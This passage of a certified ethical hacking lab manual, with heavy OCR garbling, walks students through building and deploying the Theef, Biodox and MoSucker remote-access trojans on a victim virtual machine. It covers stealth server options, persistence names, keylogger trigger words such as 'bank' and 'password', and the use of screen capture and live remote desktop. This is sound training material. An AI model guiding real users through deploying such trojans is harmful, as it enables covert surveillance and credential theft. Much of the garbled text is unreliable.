Module 06 - Trojans and Backdoors

C om puter Inform ation

Reply PCDetails re ceive d

FIGURE 8.8: Theef Compute! Information

13. Click die Spy icon to capture screens, keyloggers, etc. o f die victim’s machine.
p r TTieef v.2.10 C om puter Inform ation User name: Administrator Computer name: WIN-EGBHISG14L0 Registered organisation: Microsoft Registered owner: Microsoft Workgroup: [Unknown] Available memory: 565 Mb of 1022 Mb Processor: Genuinelntel Inte64 Family 6 Model 42 Stepping 7 (3 09 5 M hz) Display res: 800 x 600 Printer: [Unknown] Hard drives: C:\ (6,186 Mb of 16,381 Mb free)

PC Details

<#] OS Info

^ 5 Home

Network

FIGURE 8.9: Theef Spy

14. Select K eylogger to record die keystrokes ol die victim. 15. 111 the K eylogger window, click die Play button to record the keystrokes.

C E H L ab M a n u al P age 495

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Keylogger [Started]

cv
FIGURE 8.9: Theef Keyloggei Window

‫־‬ *j

16. Now go to W indows Server 2008 and type some text 111 Notepad to record die keystrokes.
Keylogger [Started]

[New Text Document.txt - Notepad] HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}

*51

tv

<?

©

FIGURE 8.10: Theef recorded Key Strokes

17. Similarly, you can access die details of die victim’s machine by clicking die respective icons.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure dirough public and free information.

C E H L ab M an u al P age 496

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

PLEASE TALK TO YOUR IN STRU CTO R R E L A T E D T O T H IS LAB.

IF YOU

HAVE

QUESTIONS

T o o l/U t ilit y

In fo rm a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

O u tp u t: T heef Victims machine PC Information Victims machine keystorkes

Questions
1. Is there any way to falter out the "localhost:# # # # " remote address entries? 2. Evaluate the other details displayed by “autoruns” and analyze the working of the autonins tool.

In tern et C o n n e c tio n R eq u ired

□ Yes P latform S upported 0 C lassroom

0 No

0 !Labs

C E H L ab M an u al P age 497

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Creating a Server Using the Biodox
Theef is a Windons based applicationfor both the client and server end. The Theef server is a vims that yon install on your victims coup!iter, and the Theef client in nhat yon then use to control the virus.
ICON KEY

Lab Scenario
You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

/' Valuable inform ation T est your knowledge — W eb exercise W orkbook review

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks. The objectives o f the lab include: ‫י‬ ‫י‬ ■ Creating a server and testing the network tor attack Detecting Trojans and backdoors Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

ca

& Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and B ackdoors

Lab Environment
To earn‫ ״‬tins out, you need:
■ B iodox tool located at D:\CEH-Tools\CEHv 8 M odule 06 Trojans and B ackdoors\T rojans Types\GUI T rojans\B iodox Trojan

■ ‫י‬ ‫י‬ ‫י‬ ‫י‬

A computer running Windows Server 2012 as Host Machine A computer running Window Server 8 Virtual Machine (Attacker)
W indows Server 2008 running 111 Virtual Machine (Victim)

A web browser with Internet access Administrative privileges to nm tools

C E H L ab M an u al P age 498

E tliical H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m a licio u s or harmful code inside apparently harmless programming or data 111 such a way that it can g e t control and cause damage, such as mining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance of die website may differ from what it is 111 die lab, but die actual process of creating die server and die client is same as shown 111 diis lab.

Lab Tasks
m

TASK 1

1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06
Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

Create Server with Pro Rat

2. Double-click BIODOX OE Edition .e x e to m n die Trojan on die victim’s machine.
r I 0 w 1 -* ) Favorites W D esktop ‫־‬ ' Shaic « Vievr A p p lic a to r took M anage ► Biodox v | C, | | Search Biodox B io d o x v © Home t

‫ ז‬, ‫ ־‬, , n sT y p c s ► G U IT rojans ► B o cox T iojen Jl. L an g u a g e Pbgns

*

.

£ . D ow nloads R e ce n t places

; 3 BI3COX CE Edition.e<e]
' Lee m e & MSCOMCTL.OCX

3 9 Libraries H ) D o cu m en t? M usic B P ictu re s

j * MSW1NSOCOCX A r e s .q f g sew ings.ini

|§ j Videos

FIGURE 9.1: Windows 8-Biodox Contents

3.

1 11 the Open File - Security Warning window, click Run. as shown in following screenshot.
Open File ‫ ־‬Security Warning
T h e p u b lish e r c ou ld n o t b e v e rifie d . A r e yo u sure you w a n t to run this so ftw a re ? Name: P u b lish e r Type: From: ...I T ro jan s\B iodoxTrojan\B iodox\B IO D O X OE Edition.exe U n k n o w n P u b lish e r A p p licatio n Z:\CEH v8 M o d u le 06 Trojans and Backdoors\Trojans T...

Run

Cancel

This file does n ot have a v alid d igital signature that verifies its publisher. You should o n ly run software fro m publishers yo u trust. H o w can I d ecide w hat software to run?

FIGURE 9.2: Windows 8-Security Warning

C E H L ab M an u al P age 499

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

4.

Select yourpreferred language from die drop-down list in die Biodox main window: 111 diis lab we have selected English.
Biodox Open Source Edition

£ 3 commun
A passw or m anage keyboar msn se tt

O g settings________
0 system information (51 ; f in m anager
y f1 commands c aptu re server properties local tools |w c o n tac t us

C o rrec tio n f f Cermet tkn g 5 T ransfer W ebCam B s< r# * n

Poet 6061 6662 6663 6664
ua>

User Name

Computer...

Admin

-------- ---

S t a t u s : R e a d y ...

C o d e d By W h o ! | w h o @ t ik k y s o ft .c o m

FIGURE 9.3: Windows 8-Biodox main window language selection

5. Now click die Server Editor button to build a server as shown 111 die following screenshot.
Biodox Open Source Edition

- Fake Error Message ‫־‬ 3 commenfcaton £ ‫ ־־־‬passwords manage fifes ‫ נ‬keyboard 5 P msn settjnos $ O settings manage' systenr r 1fo‫־‬m a o x 1

□00
I P /[ * S -

□ . -----------

; Msg Title

Error*

| Test M essage

|

| biodox w a s here Message Icon :

Adress:
r Victim Na N am e:

©
Connection; |6 6 6 1
T r a n sfe r:|666? [‫ ־‬connection Connection Delay ‫־‬

‫צג‬
| Screen Capture; |6663 | | |6664

‫ יוד‬f in m w aoff gp > commands \J^ capture 5j strver nropprtiet local tools M contact us

| webcam C apture:

Q U vf^l
K *y:

c#<‫־‬. for conrwtioi O Windowo O Temp 0 Sy8tem32

-Regetry Settings‫״‬ mssrs:

Server Mode‫־‬ (•> Gizli Mod O Yardyrr Moou

s

C orrection *3 Connection S T ransfer ? ? Screen 5 WebCam

Pxt 6561 6562 6563 6564 Admin | Opera tin... | Cpu | Ram Coentry

Status : Read/...

active / deactive status

FIGURE 9.4: Windows 8-Security Warning

6. 1 11 Server Editor options, enter a victim’s IP address in die IP/DNS field; in diis lab we are using W indows Server 2008 (10.0.0.13).
C E H L ab M an u al P age 500 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

7. Leave die rest o f die settings at dieir defanltd; to build a server click die Create Server button.
Note: IP addresses may ditter 111 your classroom labs.
Biodox Open Source Edition
| H !13 com m uucaton £ passw ords m anage files keyboard msn settings settings m aT age‫־‬ systen- 1n fo ‫־‬m aton commands capture 7

Server Editor

□ 0 0
-IP /D fs S ------A d re ss: 110.0.0 13| N am e: |v‫־‬ictim

---------Msg Title : Message : |ErfQH |biodox w a s he re I Message Icon :

^

©
C onn ection: [6661

‫צג‬
| Screen C a p tu r e : [6663 [6664 | |

■ » f i r m anager

2 j se rv e r properties
■ ‫*׳‬f k>:al tools '‫ )ץס‬contact us

1- Connection Delay —

T r a n s f e r :|6662

| webcam C apture:

D d a y |i0 n * *C
O
Windows

O

Temp

0

5ystem 32

-R egistry S e ttin g s‫־‬ K ey : V akje : C orrection ? 5 Connection ® T ransfer ? ? Screen S WebCam Port 6561 6562 6563 6564 m ssrs3 2 m ssrs3 2 .e x e ■ Server Mode © Gizli Mod O Yardyn‫ ־‬MoCu 0

J_ U £ J

Vetim Marne

IP Adress

UserNarre

Computer...

Admin

Operatin...

Cpu

Ram

C ouitry

Status : Ready...

create server

FIGURE 9.5: Bodox Main Screen

S erver.exe tile will be created 111 its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

‫׳‬
| | Home Share « View

A pp licator Toots M anage

B io d o x "S’ ©

5 0 - ♦g
-Z Favorites E Desktop 4 D ow nloads ‘k\l Recent places

Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox J 4 Language M P lj 9 ‫ ״‬t BIOCOX Cb fcd!t10 n.e<e j p U in w MSCOMCTL.OCX

v|C |

| Scorch Biodox

Libraries 0 D ocu m ents

gM S\A 1N SC K .0C X £ 1 e s .g f p i / [ server.exe") f t 5ertingj.ini

J'' M usic B 0 Pictures Videos

-

FIGURE 9.5: Bodox services

9. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to mil die serv er.ex e tile.

C E H L ab M an u al P age 501

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

’ r 0)or» "ypea - GUI Trojon* - 3‫׳‬odo<c Tro,0‫־‬ n - Biodox ■ ‫׳‬ Pile edit /1eA‫׳‬

‫ ־־‬i t t J i F -

&

‫־‬ools

ie p » (__ Open I *I tnodfi«d I *I Typ* a

Crg»m:e ~ Fa/orite Links f D ocuncnts

Ms.. I•I

I i^ P tu g n s
4 I b 1 X O ^ Or & 4to r .ete p Leetre MSWINSCK. C O <£ m 5c <*‫׳‬c t . . ocx

% 1 Pictu-es R j Music More »

i^serangs.r

i. ... ^

.*jm-r.

3iodo!c Trojan J . Botox JA Language J4 Pogne

FIGURE 9.6: Bodox server.exe

10. Double-click server.exe 111 Windows Server 2008 virtual macliine, and click Run 111 die Open File - Security Warning dialog box.
‫ ן‬Open File - Security Warning The publisher could not be verified. Are you sure you want to run this software?

E

Name: Publisher:

.. .pes\GUI Trojans'Biodox Tr0jatVf310d0x\server.exe U n know n P ub lisher

Type: Application From: Z:\CEHv8 Module 06T roja n s and Backdoors \Trojan...

Run

Cancel

tgV

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run*

FIGURE 9.7: Run the tool

11. Now switch to Windows 8 Virtual Macliine and click die active/d eactive sta tu s button to see die connected machines.

C E H L ab M an u al P age 502

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Biodox Open Source Edition
S e r v e r Editor -F a k e Error Message — r S commcnicaton passw ords m anage ftes

□Q S
A d re ss: 10.0.013 - Vctim flam e‫־‬ N am e: Ivic

□ ‫■־‬ -----------|br-or

Msg TlUc ; M e ssa g e :

‫כ‬

j keyboard
f la m snsettjnos settings ma-iage‫־׳‬ O system n f o ‫־‬matr>n ‫׳‬.‫־‬ #.• fin m a n a o e r jj‫ ׳‬commands [_jj capture

[biodox w

Message Icon :

C on n e ctio n : T r a n s f e r :|6 6 s?

[6661

| S a e e n C a p tjre :

|6663 |

|

3 se rv e r properties
A local tools “ \) contact us

r connection c onnection D elay -

| webcam C apture:

|6664

D ^ a y jiOI

1ee. ‫ זכי‬connectioi

O
-R e g etry S ew ingsK ey: m ssrs:

Windows

O

Temp

0

System 32

•se rv e r M o d e © Gizli Mod O Yardyrr Mocu

Connection S Connection T ransfer ® Saeen ® WebCam

P xt
6561 6962 6563 6564

Vctom Name

IP Adress

User Narre

Con>putcr...

Admin

Operatin...

Cpu

Ram

Coentry

S t a t u s : S e t t i n g s s a v e d an d s e r v e r c r e a te d (

a c t iv e / d e a c t iv e s t a tu s

FIGURE 9.8: Bodox open source editior

12. After getting connected you can view connected victims as shown 111 die following screenshot.
Biodox Open Source Edition

(D0I
3 commcnicaton 2 ‫ ־'־‬passw ords m anage fles keyboard msn settinos settings maTage‫־׳‬ systerr n fty m a to n

‫ם‬00
A d re ss: 10.0.013

---------Msg T itle : Message : [Errofl |biodox w a s here | Message Icon ;

O

‫*׳‬fl'• f in m anager commands | j | capture ijj se rv e r prop»rt 1 »c ‫ ־־‬local tools ^}) contact us

----C onnection: r Connection Delay — o«l»y | 1 0 | fer ‫־‬ T r a n s f e r :[6662

©
|6661

‫צב‬

V
|6663 | | |6€€4

| S a e e n C a p tu r e :

| webcam C apture:

- Install P a th ------------------------

O
K ey: m ssrs3 2

Windowo

O

Temp

r Server M o d e O Yordyro Modu

:

mssrs32e:

:o n re rtc n
S Connection H Transfer ‫ לי‬Saeen S WebCam 6561 I 6562 6563 6564

J /D

a lte m fc

. IP Adress______U ssi Marcs___ CaniButfir...__ Admin_____ Qpsratin..._ _ cpu Adrrinistr... WIN -EGB.. Win Vista 3D93

0 .9 9 GB

U nited.

S t a t u s : d i e n t A c t iv e

FIGURE 9.9: Bodox open source editior

13. Now you can perform actions with die victim by selecting die appropriate action tab in die left pane of die Biodox window. 14. Now click the settin g s m anager opdon to view the applications running and odier application settings.
C E H L ab M an u al P age 503 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Biodox Open Source Edition

@ 01 rS
A

Name S I (system pr... H*J c y tttm 2 3 s m s s .e x e H 3 csrss.ex e csrss.ex e H•!! wmm1 t.e> e L.-J ‫׳‬.vinlogon ex e

PID 0 4 432 500 544 552 580 628 640 648 836 896 992 1015 244 296 360

Path System System System System System System System System System System System System System System System System System

Memory ... 0 0 929792 5701632 7430144 4849664 6287360 7188480 10821632 4812800 6418432 7192576 9965568 7016448 33181695 12562432 12091392

Priority

a

commuiicaton

passw ords m snags fles

0 H B 0
‫ן‬-------- 1

j keyboard
f la m snse ttm as 9 se ttings m aT agy 1 a p jlic a to n s ~ | 1 A a p ^ ic a to n setbnos £ ex3lore‫ ׳‬s e tin g s C3 pm t ^ services 0 system information ‫׳‬. $• fun m anager jj1 ‫ ׳‬commands ^ capture j se rv e r prop ero e; A !oral tools W) con tact us Connection 5 Connection T ransfer ® Screen ® WebCam

Normal Normal Not rial Hiob High Normal Normal Normal Normal Normal Normal Normal Normal Normal Normal v

1 1 ‫ )ן‬se rv c e s .e x e
I Q k a s s .e x e 5 lls m .e x e i y svch o st.e x e 1 3 sv c fo st.e x e svch o st.e x e iij) svch o st.e x e svch o st.e x e iiJ d s v c .e x e svch o st.e x e

□ 1*1 !‫וזו‬

P xt
6561 6962 6563 6564

? A dress

User Narre Admmstr...

C om puter... WIN-EGB...

Admin True

O peratin...

Cpu 0 .9 9 GB U nited...

Status : successfully

Clear Application List

FIGURE 9.9: Boclox open source editor

15. You can also record die screenshots o f die victim by clicking die Screen Capture button. 16. Click die Start S creen Capture button to capture screenshots o f die victim’s machine.

FIGURE 9.10: screen capmre

17. Biodox displays the captured screenshot of the victim’s machine.

C E H L ab M an u al P age 504

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

V

41 *

*

** V

Saeen Capture

x

Rctydean

‫ס‬

‫ט‬ 9 'V.H51

SL
Nr* Te*t Doarvw.txr

B

FIGURE 9.11: screen capture

18. Similarly, you can access die details o f die victim’s machine by clicking die respective functions.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posmre and exposure dirough public and tree information.

PLEASE TALK TO YOUR INSTRU CTO R R E L A T E D T O T H IS LAB.

IF YOU

HAVE

QUESTIONS

T o o l/U tility B iodox

In fo rm atio n C o llected /O b jectiv es A chieved O u tp u t: Record the screenshots o f the victim machine

In te rn e t C o n n ectio n R eq u ired □ Yes P latform S upported 0 C lassroom 0 !Labs 0 No

C E H L ab M an u al P age 505

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council AH Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Creating a Server Using the MoSucker
M oSucker is a V isual Basic Trojan. M0Snke/Js edit server program has a client )rith the same layout as suhSeven's client.
I CON KEY
[£Z7 Valuable inform ation______ .y v T est vour knowledge_______ **
< ‫־‬r • .

Lab Scenario
A backdoor is a secret or unauthorized channel for accessing computer system. 111 an attack scenario, hackers install backdoors 011 a machine, once compromised, to access it 111 an easier manner at later times. W ith the growing use o f e-commerce, web applications have become the target o f choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take required preventive steps. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft ot valuable data Jtrom the network, and identity theft.

W eb exercise W orkbook review

Lab Objectives
The objective o f this lab is to help students learn to detect Trojan and backdoor attacks. Tlie objectives o f the lab include:
I T Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

■ ■ ■

Creating a server and testing the network for attack Detecting Trojans and backdoors Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment
To carry tins out, you need:
■ M oSucker tool located at D:\CEH-T00 ls\CEHv 8 M odule 06 Trojans and B ackdoors\T rojans Types\GUI T rojans\M oSucker

‫י‬
C E H L ab M an u al P age 506

A computer running Windows Server 2012 as host machine
E tliical H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors


A computer running Window Server 8 Virtual Machine (Attacker)
W indows Server 2 008 running 111 Virtual Machine (Victim)

■ ■

A web browser with Internet access Administrative privileges to mil tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program diat contains m a licio u s or harmful code inside apparendy harmless programming or data 111 such a way that it can g e t con trol and cause damage, such as ruining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may differ from what it is in die lab, but die actual process of creating die server and die client is same as shown 111 diis lab.

Lab Tasks
3 t a s k 11. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 _ Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker. Create Server with ProRat2. Double-click die C reateServer.exe file to create a server.
F - p |
i

‫־‬

‫׳‬ Sh View

A pp licator Tools M anage

M oSucker ‫ש‬ V | <‫ | | צ‬Scorch M oSuckcr fi © |

Home

Trcjans T ypes ► GUI Trojans ► MoSuckcr * _ -<‫ ׳‬Favorites ■ Desktop “ J ! AY Firewall e /e n ts J tcg i Jl. pi j g ns j . runtim K screen shots 04 Libraries Q D ocu m ents ^ M Music Pictures J i slons j . stub | ^C fea? eServer.exe | M jSjcL cr exe j_] R eadM e.txt

f t D ow nloads '2Al Recent place}

Q j Vid»oc lO iterrc

1 it*m cel»rt#d 456 K2

FIGURE 10.1: Install createServer.exe

3. 111 the Open File - Security Warning dialog box, click Run.

C E H L ab M an u al P age 507

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Open File ‫ ־‬Security Warning
Th e p u b lish e r c o u ld n o t b e v e rifie d . A r e you s u re you w a n t to run this so ftw a re ? Nam e: ...Trojans Types\GUI Trojans\M oSucker\CreateServer.exe U n k n o w n P u b lish e r A p p lic a tio n Z:\C EH v8 M o d u le 06 Trojans and BackdoorsVTrojans T...

S3

P u b lish e r Type: From:

Run

Cancel

This file does not have a v alid d igital signature tha t verifies its publisher. Y o u should o n ly run software fro m publishers y o u trust. H o w can I d ecide w hat software to run?

FIGURE 10.2: Install createServer.exe

£ / Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and B ackdoors

4. The MoSncker Server Creator/Editor window appears, leave die default settings and click OK.
MoSucker 3.0
S erver C reato r/E d itor
Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty Compiled for Public release B on November 20/2002, VB6 (• I want to create a stealth trojan server for a victim IIndude Msvbvm60.dll in your MoSucker server (adds 750 KB) Recommended!

m
CD

17 Indude mswinsock.ocx in your server (adds 50 KB) 17 Pack for minimal file size MoSudcer Transport Cipher Key TWQPQJL25873IVFCSJQK13761 V ( Add | 2385 KB to the server.

CD CD

‫ש‬
‫ש‬

I want to create a visible server for local testing. I want to edit an existing server

17

Start configuration after creating the server

About

Cancel

Ok

FIGURE 10.3: Install createServer.exe

5. Use die file name server.exe and to save it 111 die same directory, click
Save.

C E H L ab M an u al P age 508

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

&
© 0 O rgan ize w 0 ^ [ « GUI T rojans N e w fold e r * N am e

MoSucker Server C re a to r.
► M oSucker Search M oSucker

D o c u m e n ts

D ate m o d ifie d 9 /1 9 /2 0 1 2 1:37 PM 9 /1 9 /2 0 1 2 1 : 3 7 PM 9 /1 9 /2 0 1 2 1:37 PM 9 /1 9 /2 0 1 2 1 : 3 7 PM 1 0 /1 /2 0 1 2 6:56 PM 9 /1 9 /2 0 1 2 1:37 PM 1 0 /1 /2 0 1 2 6:50 PM 1 1 /2 8 /2 0 0 2 2:59 AM 1 1 /2 2 /2 0 0 2 5:10 PM

T yp e File f o ld e i File f o ld e i File f o ld e i File f o ld e i File f o ld e i File f o ld e i File f o ld e i A p p licatia A pp licatifl

J 1 M u sic i . AV Firewall e v e n ts P ictu res 8 V id e os

Xc g i
J X p lu g in s r u n tim e s J . s c r e e n sh o ts X - sk in s

H om egroup

: ■ C o m p u te r J ^ V L ocal D isk ( C ) J p C reateServer.exe C E H -T ools ( \\1 0 . j g | M 0 Su ck er.exe ^ N etw ork stu b

File Q am eJ 5 Save as t y p e E xecu tab le F iles (*.exe)

“■ H id e Folders

Save

C an c el

FIGURE 10.4: Save Server.exe

6. MoSucker will generate a server with the complete settings in die default directory.
MoSucker 3.0

G e n e r a t i n g s e r v e r ...
100% complete Build Date: Build Info:
11/28/2002 2:04:12 AM MoSucker 3.0 Public Release B

L e v e l A c c e s s e d : Public UPX
Verifying necessary filepaths Preparing first stub Preparing second stub Packing first stub Packing second stub Modifying file headers

FIGURE 10.5: Install server progress

7. Click OK 111 die Edit Server pop-up message.
Edit Server 3.0

S e rv e r c re a te d s u c c e s s fu lly ! S e rv e r size: 1 5 8 KB. D o n o t re p a c k s e rv e r.

OK

FIGURE 10.6: Server created successful

1 11 the MoSucker wizard, change die VictinVs Nam e to Victim or leave all the settings as dieir defaults.

C E H L ab M an u al P age 509

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

MoSucker 3.0
Selected Server: |2:VCEHv8 Modde 06 Trojans and Backdoors\Trojans Type [ Close

N a m e A ’o rt
Password [ f Notification 1 Notification 2

Server ID: Cypher Key: Victim's Name: Server Name(s): Extension(s): Conrectior-Bort:

1501704QWEYJC: 4264200TPGNDEVC TWQPCUL25873IVFCSJQK13761 |vict!m ~]

‫ש‬ ‫ש‬ ‫ש‬ ‫ש‬

0

kernel32,mscOnfig,winexec32,netconfig‫״‬ exe,pif,bat,dliope,com,bpq,xtr,txp, 142381

Options

0

J< gyjg99gFake Error File Properties

I * Prevent same server multi-infections (recommended)

You may select a windows icon to associate with your custom file extension/s.

Read

Save

FIGURE 10.7: Give die victim machine details

9. Now click K eylogger 111 die left pane, and check die Enable off-line keylogger opdon, and dien click Save. 10. Leave die rest of die settings as dieir defaults.
MoSucker 3.0
Selected Server:

|z :\C E H v 8Module 06 Trojans and Backdoors \Trojans Type
P I !Enable off-line keyioggetj
Log Filename: monitor.kig

[

C~\ Close

Name/Port Password

[T]

‫ש‬ ‫ש‬

Options

1 ‫ ־‬Enable Smart Logging
Captwn key words to trigger keylogger (separate each with a comma) ho tmad,yahoo',login‫׳‬password,bankfsecurefcheckoutfregister,

Keylogger Plug-ns ^< 11 Fake Error Fde Properties

Read

Save

FIGURE 10.8: Enable the keylogger

11. Click OK 111 die EditServer pop-up message.
MoSucker EditServer 3.0

o

Server saved successfully. Final server size: 158 KB

OK

FIGURE 10.9: Server save file

C E H L ab M an u al P age 510

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\MoSucker to run die server.exe hie. 3 2 ^ -Jp j* 1 Si H I
Pit Edl Vtew * favorite Links ~odi Virnt •tep *

©
I- ‫■־‬ ■ ° ■

£ Pitres
1• Ml* v .1

■ » -» - H Ii*co

i AVFrmsI e\en3

|

4. 1 •

^ a‫־‬ e

— * ^viS vcce'.sxe

_______________________ I l__ ^ ^
FIGURE 10.10: click server.exe

13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run 111 die Open File - Security Warning dialog box.
Open File - Security Warning The publisher could not be verified. run this software?

x1 1
Are you sure you want to

Name: .. .s\T 1 r ojans Types\GUI TrojansV'loSucker'!server.exe Publisher: Type: U nknow n P ublisher Application

From: Z : \CEHv8 Module 06 Trojans and Backdoors\T 1 r o ja n ...

Run

Cancel

‫ן‬.

f!

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run ‫ל‬

FIGURE 10.11: Click on Run

14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8
Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\MoSucker to launch M oSucker.exe.

15. Double-cl1ckMoSucker.exe.

C E H L ab M an u al P age 511

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

K 11

W 1

‫־ ״‬ Ib m c t l i i Share * View‫׳‬

A pplicator took M anage

M oSucker

]© )‫( * ־‬ -{ F a v o rite K

‫ י ז ״ ז‬jnj Typca ► GUITrojanj ► MoSucker AY F rewa 1 e /e n ts M c9 J 1 £ p ljg ns r u n tim e scretnshocs -J ! 5erver.exe

v

C

| Scorch MoSuckcr

fi |

Desktop

6 D ow nloads ffil Rcccnt p l o t o

^gi Libraries H] D ocu m ents M usic [KJ Pictures !HI Videos 11 item s

^ slons stub $ C rea:eServer.exe ^M oSu derp e] j | R ead M e.M £ 5,

1 item selerted 3.08 MB

FIGURE 10.12: click on Mosuker.exe

16. 111 tlie Open File —Security Warning dialog box, click Run to launch MoSucker.
Open File - Security Warning
The publisher could not be verified. Are you sure you want to run this software?

S3

Nam e: Publisher: Type: From:

...rs\Trojans Types\GUI Trojans\M oSucker\M oSucker.exe Unknown Publisher A p p lic a tio n Z:\C EH v8 M o d u le 06 Trojans and Backdoors\Trojans T...

Run

Cancel

This file does not have a v alid d igital signature tha t verifies its publisher. Y o u should o n ly run software fro m publishers y o u trust. H o w can I d ecide w hat software to run?

FIGURE 10.13: Run the applicatin

17. Tlie MoSucker main window appears, as shown 111 die following figure.

10.0.012
Misc stuff Infotmation File related System Spy related Fun stuff I Fun stuff II Live capture

][10005

J

u iiu u i.m o s u c h c r . t K

*
FIGURE 10.14: Mosucher main window

0G

C E H L ab M a n u al P age 512

E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

18. Enter the IP address o f die victim and port number as you noted at die time of server configuration, and dien click Connect. 19. 1 11 diis lab, we have noted Windows Server 2008 virtual machine’s IP address (10.0.0.13) and port number: 4288.
Note: These might differ 111 your classroom labs.

FIGURE 10.15: connect to victim machine

20. Now die C onnect button automatically turns to D iscon n ect after getting connected widi die victim machine as shown 111 the following screenshot.

version 3.0

FIGURE 10.16: connection established

21. Now click Misc stuff 111 die left pane, which shows different options from which an attacker can use to perform actions from liis or her system.

C E H L ab M an u al P age 513

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

'‫׳‬A b o u t

_

|

I & Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and B ackdoors

FIGURE 10.17: setting server options

22. You can also access the victim’s machine remotely by clicking Live capture in the left pane. 23. 111 the Live capture option click Start, which will open the remote desktop of a victim’s machine.
‫ ׳‬A b o u t' _ ~x]

| 4288

1 1 Disconnect 1 1 Options ] s g

J I &

Q

Misc stuff Information File related System Spy related Fun stuff I Fun stuff II Live capture Start Settings

m ake screen sh o t
Make screenshot JPEG Quality:

*

20% • 30% • 40% • 50%
• • • 60% 70% 80%

O 90%

& oi£
FIGURE 10.18: start capturing

24. The remote desktop connection ot die victim’s machine is shown 111 die following tigiire.

C E H L ab M an u al P age 514

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Rem ote adm inistration m ode

